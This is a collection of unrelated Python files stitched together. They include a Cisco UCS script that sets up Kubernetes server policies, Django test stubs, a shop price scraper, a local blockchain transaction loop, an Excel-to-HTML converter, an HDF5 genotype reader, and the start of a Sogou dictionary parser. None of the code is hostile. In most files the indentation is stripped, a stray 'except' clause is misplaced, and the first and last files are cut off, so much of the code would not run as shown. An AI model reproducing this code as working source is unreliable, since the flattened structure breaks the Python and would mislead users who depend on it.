mo = handle.query_dn("org-root/boot-policy-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createKubeLocalDiskPolicy(handle):
print "Creating Kube Local Disk Policy"
from ucsmsdk.mometa.storage.StorageLocalDiskConfigPolicy import StorageLocalDiskConfigPolicy
mo = StorageLocalDiskConfigPolicy(parent_mo_or_dn="org-root", protect_config="no", name="kube", descr="Kubernetes", flex_flash_raid_reporting_state="disable", flex_flash_state="disable", policy_owner="local", mode="raid-mirrored")
handle.add_mo(mo)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteKubeLocalDiskPolicy(handle):
print "Deleting Kube Local Disk Policy"
mo = handle.query_dn("org-root/local-disk-config-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createKubeUUIDPools(handle):
print "Creating Kube UUID Pools"
from ucsmsdk.mometa.uuidpool.UuidpoolPool import UuidpoolPool
from ucsmsdk.mometa.uuidpool.UuidpoolBlock import UuidpoolBlock
mo = UuidpoolPool(parent_mo_or_dn="org-root", policy_owner="local", prefix="derived", descr="Kubernetes Pool", assignment_order="default", name="kube")
mo_1 = UuidpoolBlock(parent_mo_or_dn=mo, to="C888-888888888100", r_from="C888-888888888001")
handle.add_mo(mo)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteKubeUUIDPools(handle):
print "Deleting Kube UUID Pool"
mo = handle.query_dn("org-root/uuid-pool-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createKubeServerPool(handle):
print "Creating Kubernetes Compute Pool"
from ucsmsdk.mometa.compute.ComputePool import ComputePool
mo = ComputePool(parent_mo_or_dn="org-root", policy_owner="local", name="Kubernetes", descr="")
handle.add_mo(mo)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def addServersToKubePool(handle, servers):
print "Adding servers to Kubernetes Pool"
from ucsmsdk.mometa.compute.ComputePool import ComputePool
from ucsmsdk.mometa.compute.ComputePooledSlot import ComputePooledSlot
from ucsmsdk.mometa.compute.ComputePooledRackUnit import ComputePooledRackUnit
from ucsmsdk.mometa.compute.ComputeRackUnit import ComputeRackUnit
from ucsmsdk.mometa.fabric.FabricComputeSlotEp import FabricComputeSlotEp
mo = ComputePool(parent_mo_or_dn="org-root", policy_owner="local", name="Kubernetes", descr="")
for s in servers:
if type(s) is FabricComputeSlotEp:
ComputePooledSlot(parent_mo_or_dn=mo, slot_id=re.sub("slot-","", s.slot_id), chassis_id=str(s.chassis_id))
if type(s) is ComputeRackUnit:
ComputePooledRackUnit(parent_mo_or_dn=mo, id=re.sub("rack-unit-","", s.rn))
handle.add_mo(mo, True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteKubeServerPool(handle):
print "Deleting Kubernetes Compute Pool"
mo = handle.query_dn("org-root/compute-pool-Kubernetes")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createServiceProfileTemplate(handle):
print "Creating Kubernetes Service Profile Template"
from ucsmsdk.mometa.ls.LsServer import LsServer
from ucsmsdk.mometa.vnic.VnicConnDef import VnicConnDef
from ucsmsdk.mometa.ls.LsRequirement import LsRequirement
from ucsmsdk.mometa.lstorage.LstorageProfileBinding import LstorageProfileBinding
mo = LsServer(parent_mo_or_dn="org-root",
policy_owner="local",
name="Kubernetes",
descr="Kubernetes Service Profile",
type="updating-template",
# Boot using Kubernetes Boot policy: local Disk, then Remote DVD
boot_policy_name="kube",
# Default Maintenance Policy
maint_policy_name="default",
# scrub policy
scrub_policy_name="kube",
# UUID Pool
ident_pool_name="kube",
# disks we use.
#local_disk_policy_name="kube",
#storage_profile_name="kube",
# virtual media policy
vmedia_policy_name="kube"
)
# create vNIC Connection Policy
VnicConnDef(parent_mo_or_dn=mo,
lan_conn_policy_name="kube")
# create server pool and add to template.
LsRequirement(parent_mo_or_dn=mo, name="Kubernetes")
# add storage profile.
mo_1 = LstorageProfileBinding(parent_mo_or_dn=mo, storage_profile_name="kube")
handle.add_mo(mo, True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
    except Exception as e:
        print e
def deleteServiceProfileTemplate(handle):
print "Deleting Kubernetes Service Profile Template"
print "Deleting Kubernetes Compute Pool"
mo = handle.query_dn("org-root/ls-Kubernetes")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createServers(handle, servers):
print "Creating Kubernetes Service Profiles"
from ucsmsdk.ucsmethodfactory import ls_instantiate_n_named_template
from ucsmsdk.ucsbasetype import DnSet, Dn
for i, s in enumerate(servers):
dn_set = DnSet()
dn = Dn()
sp_name = "kube0%d" % (i+1)
dn.attr_set("value",sp_name)
dn_set.child_add(dn)
elem = ls_instantiate_n_named_template(cookie=handle.cookie,
dn="org-root/ls-Kubernetes",
in_error_on_existing="true",
in_name_set=dn_set,
in_target_org="org-root",
in_hierarchical="false")
try:
mo_list = handle.process_xml_elem(elem)
except UcsException as err:
if err.error_code == "105":
print "\t" + sp_name + " already exists."
else:
print err
def deleteServers(handle):
print "Deleting Kubernetes Nodes"
filter_string = '(dn, "ls-kube[0-9]+", type="re")'
kube = handle.query_classid("lsServer", filter_string)
for k in kube:
print "Deleting " + k.name
handle.remove_mo(k)
try:
handle.commit()
except AttributeError:
print "\talready deleted"
except UcsException as err:
print "\t"+ k.name + ": " + err.error_descr
def createKubeVirtualMedia(handle):
print "Adding Virtual Media Policy"
from urlparse import urlparse
import os.path
yn = False
url = ""
while yn == False:
print "What is the URL for the Boot ISO image?"
url = raw_input("(E.g.: http://192.168.2.2/kubam/centos7.2-boot.iso) : ")
print "You entered: " + url
yn = raw_input("Is this correct? [y/N]: ")
if yn != "y":
yn = False
o = urlparse(url)
paths = os.path.split(o.path)
scheme = o.scheme # http, https
if scheme == "":
scheme = "http"
filename = paths[-1]
address = o.hostname
path = "/".join(paths[:-1])
name = ".".join(paths[-1].split(".")[:-1])
from ucsmsdk.mometa.cimcvmedia.CimcvmediaMountConfigPolicy import CimcvmediaMountConfigPolicy
from ucsmsdk.mometa.cimcvmedia.CimcvmediaConfigMountEntry import CimcvmediaConfigMountEntry
mo = CimcvmediaMountConfigPolicy(name="kube",
retry_on_mount_fail="yes",
parent_mo_or_dn="org-root",
policy_owner="local",
descr="Kubernetes Boot Media")
mo_1 = CimcvmediaConfigMountEntry(parent_mo_or_dn=mo,
mapping_name=name,
device_type="cdd",
mount_protocol=scheme,
remote_ip_address=address,
image_name_variable="none",
image_file_name=filename,
image_path=path)
mo_2 = CimcvmediaConfigMountEntry(parent_mo_or_dn=mo,
mapping_name="kickstartImage",
device_type="hdd",
mount_protocol=scheme,
remote_ip_address=address,
image_name_variable="service-profile-name",
image_path=path)
handle.add_mo(mo, modify_present=True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteVirtualMedia(handle):
print "Deleting Kubernetes Virtual Media Policy"
mo = handle.query_dn("org-root/mnt-cfg-policy-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createScrubPolicy(handle):
from ucsmsdk.mometa.compute.ComputeScrubPolicy import ComputeScrubPolicy
mo = ComputeScrubPolicy(flex_flash_scrub="no",
parent_mo_or_dn="org-root",
name="kube",
disk_scrub="yes",
bios_settings_scrub="no",
descr="Destroy data when SP is unassociated")
handle.add_mo(mo, modify_present=True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteScrubPolicy(handle):
print "Deleting Kubernetes Scrub Policy"
mo = handle.query_dn("org-root/scrub-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def deleteDiskGroupConfig(handle):
print "Deleting Disk Group config"
mo = handle.query_dn("org-root/disk-group-config-Kube_Boot")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def deleteStorageProfile(handle):
print "Deleting Storage Profile"
mo = handle.query_dn("org-root/profile-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createDiskGroupConfig(handle):
print "Adding Disk Group Config"
from ucsmsdk.mometa.lstorage.LstorageDiskGroupConfigPolicy import LstorageDiskGroupConfigPolicy
from ucsmsdk.mometa.lstorage.LstorageDiskGroupQualifier import LstorageDiskGroupQualifier
from ucsmsdk.mometa.lstorage.LstorageVirtualDriveDef import LstorageVirtualDriveDef
mo = LstorageDiskGroupConfigPolicy(parent_mo_or_dn="org-root",
policy_owner="local",
name="kube_boot",
descr="Kubernetes Boot Disk",
raid_level="mirror")
mo_1 = LstorageDiskGroupQualifier(parent_mo_or_dn=mo,
use_remaining_disks="no",
num_ded_hot_spares="unspecified",
drive_type="unspecified",
num_drives="2",
min_drive_size="unspecified",
num_glob_hot_spares="unspecified")
mo_2 = LstorageVirtualDriveDef(parent_mo_or_dn=mo, read_policy="platform-default",
drive_cache="platform-default",
strip_size="platform-default",
io_policy="platform-default",
write_cache_policy="platform-default",
access_policy="platform-default")
handle.add_mo(mo, modify_present=True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def createStorageProfile(handle):
from ucsmsdk.mometa.lstorage.LstorageProfile import LstorageProfile
from ucsmsdk.mometa.lstorage.LstorageDasScsiLun import LstorageDasScsiLun
mo = LstorageProfile(parent_mo_or_dn="org-root",
policy_owner="local",
name="kube",
descr="Kubernetes Storage Profile")
mo_1 = LstorageDasScsiLun(parent_mo_or_dn=mo,
local_disk_policy_name="kube_boot",
auto_deploy="auto-deploy",
expand_to_avail="yes",
lun_map_type="non-shared",
size="1",
fractional_size="0",
admin_state="online",
deferred_naming="no",
order="not-applicable",
name="KubeLUN")
handle.add_mo(mo, modify_present=True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def createKubeServers(handle, org):
createKubeBootPolicy(handle)
#createKubeLocalDiskPolicy(handle)
createDiskGroupConfig(handle)
createStorageProfile(handle)
createScrubPolicy(handle)
createKubeUUIDPools(handle)
createKubeServerPool(handle)
createKubeVirtualMedia(handle)
servers = select_kube_servers(handle)
addServersToKubePool(handle, servers)
createServiceProfileTemplate(handle)
createServers(handle, servers)
def deleteKubeServers(handle, org):
deleteServers(handle)
deleteServiceProfileTemplate(handle)
deleteKubeServerPool(handle)
deleteVirtualMedia(handle)
deleteScrubPolicy(handle)
deleteKubeBootPolicy(handle)
deleteStorageProfile(handle)
deleteDiskGroupConfig(handle)
#deleteKubeLocalDiskPolicy(handle)
deleteKubeUUIDPools(handle)
| python |
from django.test import TestCase
class geopollTest(TestCase):
"""
Tests for django-geopoll
"""
def test_geopoll(self):
        pass
import settings
import json
import unittest
import requests
from inventory.tests import fixture
class ApiTests(unittest.TestCase):
def setUp(self):
# Verify Server is running.
# Verify Elastic Search is running.
self.endpoint = 'http://{hostname}:{port}/v1/inventory'.format(
hostname=settings.ELASTIC_URL,
port=settings.ELASTIC_PORT)
def test_valid_request(self):
json_str = fixture('valid_request.json')
data = json.loads(json_str)
response = requests.post(self.endpoint + '/inventory', json=data)
self.assertEquals(response.status_code, 201)
if __name__ == "__main__":
    unittest.main()
import requests
from bs4 import BeautifulSoup
import json
from smtp import send_mail
header = {"User-agent": "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 "}
euro = 4.25
def items():
try:
with open('items.json','r') as file:
data = file.read()
global list
list = json.loads(data)
except:
print("Error when reading JSON file")
global min,min_link
def check_price(link):
# link = "www.cos2.pl/cos.html"
site_content = BeautifulSoup(requests.get(link, headers=header).content, 'html.parser')
try:
global price
site_url = link.split('/')[2]
if(site_url == 'www.x-kom.pl'):
price = int(site_content.find(attrs={'class':'u7xnnm-4 gHPNug'}).get_text().split(',')[0].replace(" ",''))
elif(site_url == 'www.komputronik.pl'):
price = site_content.find('span',attrs={'class':'price'}).find('span').get_text()
if(price == ''):
price = site_content.find('span',attrs={'class':'price'}).find('span',attrs={'ng-if':'!$ctrl.changeBaseData'}).get_text()
price = int(''.join([n for n in price if n.isdigit()]))
elif(site_url == 'www.al.to'):
name = site_content.find(attrs={'class':'sc-1x6crnh-5'}).get_text()
price = int(site_content.find(attrs={'class':'u7xnnm-4 gHPNug'}).get_text().split(',')[0].replace(" ",''))
elif(site_url == 'www.mediamarkt.pl'):
price = int(site_content.find(attrs={'itemprop':'price'}).get_text())
elif(site_url == 'www.empik.com'):
price = int(site_content.find(attrs={'class':'productPriceInfo__price ta-price withoutLpPromo'}).get_text().split(",")[0].strip())
elif(site_url == 'www.morele.net'):
try:
price = int(site_content.find('div','price-new').get_text().split(',')[0].replace(" ",''))
except:
price = site_content.find('div','price-new').get_text()
price = int(''.join([n for n in price if n.isdigit()]))
elif(site_url == 'www.euro.com.pl'):
price = site_content.find('div','price-normal selenium-price-normal').get_text()
price = int(''.join([n for n in price if n.isdigit()]))
elif(site_url == 'www.mediaexpert.pl'):
price = int(site_content.find('span','a-price_price').findNext('span','a-price_price').get_text().replace(" ",""))
elif(site_url == 'www.amazon.de'):
price = int(site_content.find('span','a-size-medium a-color-price priceBlockBuyingPriceString').get_text().split(',')[0].replace(".","")) * euro
else:
print("Site not supported: "+ site_url)
# print("{} -> {}".format(link.split('/')[2],price))
except:
print(link)
def main():
items()
# link = list["Macbook AIR"]["2019"]["Space grey"]["128"][0]
data = {}
for a in list:
for b in list[a]:
for c in list[a][b]:
for d in list[a][b][c]:
min = 10000
print("{} {} {} {}GB".format(a,b,c,d))
for e in list[a][b][c][d]:
check_price(e)
if(min>price):
min = price
min_link = e
print("{} -> {}".format(min_link.split('/')[2],min))
data["{} {} {} {}GB".format(a,b,c,d)] = [min,min_link]
comp(data)
# test_data = {"Macbook AIR 2019 Space grey 128GB": [4900, "https://www.x-kom.pl/p/506277-notebook-laptop-133-apple-macbook-air-i5-8gb-128-uhd-617-mac-os-space-grey.html"], "Macbook AIR 2019 Space grey 256GB": [5649, "https://www.x-kom.pl/p/506278-notebook-laptop-133-apple-macbook-air-i5-8gb-256-uhd-617-mac-os-space-grey.html"], "Macbook AIR 2019 Silver 128GB": [4999, "https://www.morele.net/laptop-apple-macbook-air-13-3-2019-srebrny-mvfk2ze-a-6116788/"], "Macbook AIR 2019 Silver 256GB": [5097, "https://www.mediamarkt.pl/komputery-i-tablety/laptop-apple-macbook-air-13-retina-i5-8gb-256gb-ssd-macos-srebrny-mrec2ze-a"], "Macbook PRO 2019 Space grey 128GB": [5699, "https://www.euro.com.pl/laptopy-i-netbooki/apple-laptop-mbp-tb-i5-8gb-128ssd-space-grey.bhtml"], "Macbook PRO 2019 Silver 128GB": [5649, "https://www.euro.com.pl/laptopy-i-netbooki/apple-laptop-mbp-tb-i5-8gb-128ssd-silver.bhtml"], "Macbook PRO 2017 Space grey 128GB": [4797, "https://www.mediamarkt.pl/komputery-i-tablety/laptop-apple-macbook-pro-13-3-i5-8gb-128gb-ssd-iris-plus-640-macos-srebrny-mpxr2ze-a"], "Macbook PRO 2017 Silver 128GB": [4797, "https://www.mediamarkt.pl/komputery-i-tablety/laptop-apple-macbook-pro-13-3-i5-8gb-128gb-ssd-iris-plus-640-macos-gwiezdna-szarosc-mpxq2ze-a"], "Macbook PRO 2017 Silver 256GB": [5599, "https://www.euro.com.pl/laptopy-i-netbooki/apple-macbook-pro-13-13-3-intel-core-i5-7360u-8gb-ram-256gb-dysk-os-x-sierra.bhtml"]}
# test_comp = {"Macbook AIR 2019 Space grey 128GB": [4900, "https://www.x-kom.pl/p/506277-notebook-laptop-133-apple-macbook-air-i5-8gb-128-uhd-617-mac-os-space-grey.html"],"Macbook AIR 2019 Space grey 124GB": [41230, "https://www.x-kom.pl/p/506277-notebook-laptop-133-apple-macbook-air-i5-8gb-128-uhd-617-mac-os-space-grey.html"]}
def comp(data):
with open('prices.json','r') as file:
json_data = json.loads(file.read())
lower = False
higher = False
body = {}
for item in json_data:
if(data[item][0] < json_data[item][0]):
body[item] = [json_data[item][0],data[item][0],data[item][1]]
lower = True
elif(data[item][0] > json_data[item][0]):
body[item] = [data[item][0],json_data[item][0],data[item][1]]
higher = True
if(lower):
print("Lower price")
with open('prices.json','w') as file:
json.dump(data,file, indent=4, sort_keys=True)
send_mail(body)
print("Update completed")
elif(higher):
print("Higher price")
with open('prices.json','w') as file:
json.dump(data,file, indent=4, sort_keys=True)
else:
print("No changes")
if __name__ == '__main__':
main()
| python |
import subprocess
import time
from timeit import default_timer as timer
start = timer()
commands_node1 = '''
export NODE_ID=3001
'''
addresses = [
'13XfCX8bLpdu8YgnXPD4BDeBC5RyvqBfPh',
'14L3zLQWPiXM6hZXdfmgjET8crM52VJpXX',
'1C4tyo8poeG1uFioZjtgnLZKotEUZFJyVh',
'18Nt9jiYVjm2TxCTHNSeYquriaauh5wfux',
'16uqNuajndwknbHSQw1cfTvSgsXxa5Vxi8',
'1AqNL5SPcuWqUT1SjTEQ3WGDLfy47HK74c',
'17aju9bJh3G7xC9PAkQ1j5czizA31rN77S',
'1Ci67qmp8KerJA3zZhsDC7AcXz8RCZwbt',
'1MzLjrr737WtVpubSGxN6CUECBD2vnQqef',
'165KxLW2bFms5wtKs2sNQXfD8TLQrehGCT',
'14RJHhG374XyuTLfZ48qRxUdxRLWj3BcA7',
'13L7UYXjUCGUUKF5o4oExDFQnV6p3AkDoB',
]
send_repeat = ["./blockchain_ureca send -from ",
" -amount 1 -to "]
def copy_db():
commands = "export NODE_ID=3002\n"
if i % 100 == 0 and i > 0:
print("i: ", i)
commands += "cp blockchain_3000.db blockchain_3002.db" + '\n'
process_node = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=subprocess.PIPE)
process_node.communicate(commands.encode('utf-8'))
for t in range(10000):
print("t: ", t)
for i in range(10):
commands_node1 = "export NODE_ID=3002\n"
if i % 100 == 0 and i > 0:
print("i: ", i)
commands_node1 += send_repeat[0] + addresses[i] + send_repeat[1] + addresses[10] + '\n'
process_node1 = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = process_node1.communicate(commands_node1.encode('utf-8'))
time.sleep(1)
# Make sure the new txs has been put into database
time.sleep(1)
copy_db()
time.sleep(0.5)
# commands_node1 += "./blockchain_ureca startnode -port 9090\n"
# print(commands_node1)
process_node1 = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = process_node1.communicate(commands_node1.encode('utf-8'))
# print(out)
end = timer()
print(end-start)
| python |
from rest_framework import serializers
from can_server.models import DbcFile, CanSettings
class DbcFileSerializer(serializers.ModelSerializer):
class Meta:
model = DbcFile
fields = ('FileName', 'FileData')
class CanSettingsSerializer(serializers.ModelSerializer):
class Meta:
model = CanSettings
fields = ('bustype', 'channel', 'bitrate')
| python |
from django.core import mail
from django.test import override_settings, TestCase
from django.urls import reverse
from opentech.apply.utils.testing.tests import BaseViewTestCase
from .factories import OAuthUserFactory, StaffFactory, UserFactory
@override_settings(ROOT_URLCONF='opentech.apply.urls')
class BaseTestProfielView(TestCase):
@classmethod
def setUpTestData(cls):
cls.url = reverse('users:account')
class TestProfileView(BaseTestProfielView):
def setUp(self):
self.user = UserFactory()
self.client.force_login(self.user)
def test_cant_acces_if_not_logged_in(self):
self.client.logout()
response = self.client.get(self.url, follow=True)
# Initial redirect will be via to https through a 301
self.assertRedirects(response, reverse('users_public:login') + '?next=' + self.url, status_code=301)
def test_includes_change_password(self):
response = self.client.get(self.url, follow=True)
self.assertContains(response, reverse('users:password_change'))
def test_doesnt_includes_change_password_for_oauth(self):
self.client.force_login(OAuthUserFactory())
response = self.client.get(self.url, follow=True)
self.assertNotContains(response, reverse('users:password_change'))
def test_cant_set_slack_name(self):
response = self.client.get(self.url, follow=True)
self.assertNotContains(response, 'Slack name')
class TestStaffProfileView(BaseTestProfielView):
def setUp(self):
self.staff = StaffFactory()
self.client.force_login(self.staff)
def test_can_set_slack_name(self):
response = self.client.get(self.url, follow=True)
self.assertContains(response, 'Slack name')
class TestPasswordReset(BaseViewTestCase):
user_factory = UserFactory
url_name = 'users:{}'
base_view_name = 'password_reset'
def test_recieves_email(self):
response = self.post_page(None, data={'email': self.user.email})
self.assertRedirects(response, self.url(None, view_name='password_reset_done'))
self.assertEqual(len(mail.outbox), 1)
self.assertIn('https://testserver/account/password/reset/confirm', mail.outbox[0].body)
| python |
import xlrd
class ReadExcel:
def readexcel(self, url):
        data = xlrd.open_workbook(url) # open the .xls file
        table = data.sheets()[0] # first sheet
        nrows = table.nrows # number of rows in the sheet
htmlhead = '''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>'''
        htmltable = '<table border="1">'
for row in range(nrows):
htmltable += '<tr>'
for e in table.row_values(row):
htmltable += '<td>' + str(e) + '</td>'
htmltable += '</tr>'
htmltable += '</table>'
htmltail = '</body></html>'
html = htmlhead + htmltable + htmltail
print(html)
return html
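# Hedged usage sketch (file names are placeholders, not from the original source):
# render the first sheet of an .xls workbook as an HTML table and save it.
if __name__ == '__main__':
    reader = ReadExcel()
    html = reader.readexcel('example.xls')  # hypothetical input file
    with open('example.html', 'w') as out:
        out.write(html)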
| python |
from __future__ import absolute_import
from six.moves import range
try:
import h5py
except:
pass
import logging
import scipy as sp
from fastlmm.pyplink.snpset import *
from fastlmm.pyplink.altset_list import *
#!!document the format
class Hdf5(object):
def __init__(self,filename, order = 'F',blocksize=5000):
self._ran_once = False
self.h5 = None
##!! copy relevent comments from Bed reader
self.filename=filename
self.order = order
self.blocksize = blocksize
def copyinputs(self, copier):
copier.input(self.filename)
@property
def snp_to_index(self):
self.run_once()
return self._snp_to_index
def run_once(self):
if (self._ran_once):
return
self._ran_once = True
try:
self.h5 = h5py.File(self.filename, "r")
except IOError as e:
raise IOError("Missing or unopenable file '{0}' -- Native error message: {1}".format(self.filename,e))
self._original_iids = sp.array(sp.array(self.h5['iid']),dtype=str)
self.rs = sp.array(sp.array(self.h5['rs']),dtype='str')
self.pos = sp.array(self.h5['pos'])
## similar code in bed
self._snp_to_index = {}
logging.info("indexing snps");
for i,snp in enumerate(self.rs):
if snp in self._snp_to_index : raise Exception("Expect snp to appear in bim file only once. ({0})".format(snp))
self._snp_to_index[snp]=i
self.snpsInFile = self.h5['snps']
if "SNP-major" not in self.snpsInFile.attrs: raise Exception("In Hdf5 the 'snps' matrix must have a Boolean 'SNP-major' attribute")
self.is_snp_major = self.snpsInFile.attrs["SNP-major"]
S_original = len(self.rs)
N_original = len(self.original_iids)
if self.is_snp_major:
if not self.snpsInFile.shape == (S_original, N_original) : raise Exception("In Hdf5, snps matrix dimensions don't match those of 'rs' and 'iid'")
else:
if not self.snpsInFile.shape == (N_original, S_original) : raise Exception("In Hdf5, snps matrix dimensions don't match those of 'rs' and 'iid'")
@property
def snp_count(self):
self.run_once()
return len(self.rs);
@property
def original_iids(self):
self.run_once()
return self._original_iids
#same code is in Bed. Could this be moved to an abstract class?
def read(self,snp_set = AllSnps(), order="F", dtype=SP.float64, force_python_only=False):
self.run_once()
snpset_withbed = snp_set.addbed(self)
return self.read_with_specification(snpset_withbed, order=order, dtype=dtype, force_python_only=force_python_only)
@staticmethod
#should move into utils
def is_sorted_without_repeats(list):
if len(list) < 2:
return True
for i in range(1,len(list)):
if not list[i-1] < list[i]:
return False
return True
def __del__(self):
if self.h5 != None: # we need to test this because Python doesn't guarantee that __init__ was fully run
self.h5.close()
def read_direct(self, snps, selection=sp.s_[:,:]):
if self.is_snp_major:
selection = tuple(reversed(selection))
if snps.flags["F_CONTIGUOUS"]:
self.snpsInFile.read_direct(snps.T,selection)
else:
self.snpsInFile.read_direct(snps,selection)
#!! much code the same as for Bed
def create_block(self, blocksize, dtype, order):
N_original = len(self.original_iids) #similar code else where -- make a method
matches_order = self.is_snp_major == (order =="F") #similar code else where -- make a method
opposite_order = "C" if order == "F" else "F"#similar code else where -- make a method
if matches_order:
return sp.empty([N_original,blocksize], dtype=dtype, order=order)
else:
return sp.empty([N_original,blocksize], dtype=dtype, order=opposite_order)
def read_with_specification(self, snpset_with_snpreader, order="F", dtype=SP.float64, force_python_only=False):
self.run_once()
order = order.upper()
opposite_order = "C" if order == "F" else "F"
snp_index_list = sp.array(list(snpset_with_snpreader)) # Is there a way to create an array from an iterator without putting it through a list first?
S = len(snp_index_list)
S_original = self.snp_count
N_original = len(self.original_iids)
# Check if snps and iids indexes are in order and in range
snps_are_sorted = Hdf5.is_sorted_without_repeats(snp_index_list)
if hasattr(self,'_ind_used'):
iid_index_list = self._ind_used
iid_is_sorted = Hdf5.is_sorted_without_repeats(iid_index_list)
else:
iid_index_list = sp.arange(N_original)
iid_is_sorted = True
N = len(iid_index_list)
SNPs = sp.empty([N, S], dtype=dtype, order=order)
matches_order = self.is_snp_major == (order =="F")
is_simple = not force_python_only and iid_is_sorted and snps_are_sorted and matches_order #If 'is_simple' may be able to use a faster reader
# case 1 - all snps & all ids requested
if is_simple and S == S_original and N == N_original:
self.read_direct(SNPs)
# case 2 - some snps and all ids
elif is_simple and N == N_original:
self.read_direct(SNPs, sp.s_[:,snp_index_list])
# case 3 all snps and some ids
elif is_simple and S == S_original:
self.read_direct(SNPs, sp.s_[iid_index_list,:])
# case 4 some snps and some ids -- use blocks
else:
blocksize = min(self.blocksize, S)
block = self.create_block(blocksize, dtype, order)
if not snps_are_sorted:
snp_index_index_list = sp.argsort(snp_index_list)
snp_index_list_sorted = snp_index_list[snp_index_index_list]
else:
snp_index_index_list = sp.arange(S)
snp_index_list_sorted = snp_index_list
for start in range(0, S, blocksize):
#print start
end = min(start+blocksize,S)
if end-start < blocksize: #On the last loop, the buffer might be too big, so make it smaller
block = self.create_block(end-start, dtype, order)
snp_index_list_forblock = snp_index_list_sorted[start:end]
snp_index_index_list_forblock = snp_index_index_list[start:end]
self.read_direct(block, sp.s_[:,snp_index_list_forblock])
SNPs[:,snp_index_index_list_forblock] = block[iid_index_list,:]
rs = self.rs[snp_index_list]
pos = self.pos[snp_index_list,:]
iids = sp.array(self.original_iids[iid_index_list],dtype="str") #Need to make another copy of to stop it from being converted to a list of 1-d string arrays
has_right_order = (order=="C" and SNPs.flags["C_CONTIGUOUS"]) or (order=="F" and SNPs.flags["F_CONTIGUOUS"])
#if SNPs.shape == (1, 1):
assert(SNPs.shape == (N, S) and SNPs.dtype == dtype and has_right_order)
ret = {
'rs' :rs,
'pos' :pos,
'snps' :SNPs,
'iid' :iids
}
return ret
@property
def ind_used(self):
# doesn't need to self.run_once() because only uses original inputs
return self._ind_used
@ind_used.setter
def ind_used(self, value):
'''
        Tell the Hdf5 reader to return data for only a subset (perhaps proper) of the individuals in a particular order
e.g. 2,10,0 says to return data for three users: the user at index position 2, the user at index position 10, and the user at index position 0.
'''
# doesn't need to self.run_once() because only uses original inputs
self._ind_used = value
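    # Hedged illustration (not in the original file): restrict a read to the
    # individuals at index positions 2, 10 and 0, in that order, e.g.
    #   reader = Hdf5("snps.hdf5")  # hypothetical file
    #   reader.ind_used = sp.array([2, 10, 0])
    #   result = reader.read()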
@staticmethod
def write(snpMatrix, hdf5file, dtype='f8',snp_major=True,compression=None):
if not isinstance(dtype, str) or len(dtype) != 2 or dtype[0] != 'f' : raise Exception("Expect dtype to start with 'f', e.g. 'f4' for single, 'f8' for double")
data = (snpMatrix['snps'].T) if snp_major else snpMatrix['snps']
with h5py.File(hdf5file, "w") as h5:
h5.create_dataset('snps', data=data,dtype=dtype,compression=compression,shuffle=True)
h5['snps'].attrs["SNP-major"] = snp_major
h5.create_dataset('iid', data=snpMatrix['iid'])
h5.create_dataset('pos', data=snpMatrix['pos'])
h5.create_dataset('rs', data=snpMatrix['rs'])
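# Hedged usage sketch (not part of the original module): write a tiny fake SNP
# matrix using the dict layout Hdf5.write expects ('snps', 'iid', 'pos', 'rs'),
# mirroring what read_with_specification returns. Shapes, values and the output
# path are illustrative only.
if __name__ == "__main__":
    demo = {
        'snps': sp.array([[0., 1., 2.], [1., 0., 2.], [2., 1., 0.], [0., 0., 1.]]),  # 4 individuals x 3 SNPs
        'iid': sp.array([[b"fam1", b"ind1"], [b"fam2", b"ind2"],
                         [b"fam3", b"ind3"], [b"fam4", b"ind4"]]),
        'pos': sp.array([[1, 0.0, 100], [1, 0.0, 200], [1, 0.0, 300]]),
        'rs': sp.array([b"rs1", b"rs2", b"rs3"]),
    }
    Hdf5.write(demo, "demo_snps.hdf5")  # hypothetical output file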
| python |
__author__ = 'lionel'
#!/usr/bin/python
# -*- coding: utf-8 -*-
import struct
import sys
# A Sogou .scel dictionary stores its text as 2-byte unicode characters
# (each Chinese character or English letter takes two bytes); parsing it is
# just a matter of finding the offset of each section.
# There are two main sections:
#
# 1. Global pinyin table (apparently every pinyin syllable, in dictionary order),
#    a list of (index, len, pinyin) records:
#    index:  2-byte integer, the index of this pinyin syllable
#    len:    2-byte integer, the byte length of the pinyin string
#    pinyin: the pinyin string itself, 2 bytes per character, len bytes in total
#
# 2. Chinese word table,
#    a list of (same, py_table_len, py_table, {word_len, word, ext_len, ext}) records:
#    same:         2-byte integer, the number of homophones
#    py_table_len: 2-byte integer
#    py_table:     list of 2-byte integers, each an index into the global pinyin table
#
#    word_len: 2-byte integer, byte length of the Chinese word
#    word:     the Chinese word, 2 bytes per character, word_len bytes in total
#    ext_len:  2-byte integer, length of the extension data (seems to always be 10)
#    ext:      extension data; the first 2 bytes are an integer (possibly the word
#              frequency), the remaining 8 bytes are all zero
#
#    {word_len, word, ext_len, ext} repeats 'same' times: homophones share the same
#    pinyin table.
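# A hypothetical record for illustration: bytes 01 00 02 00 61 00 in the pinyin
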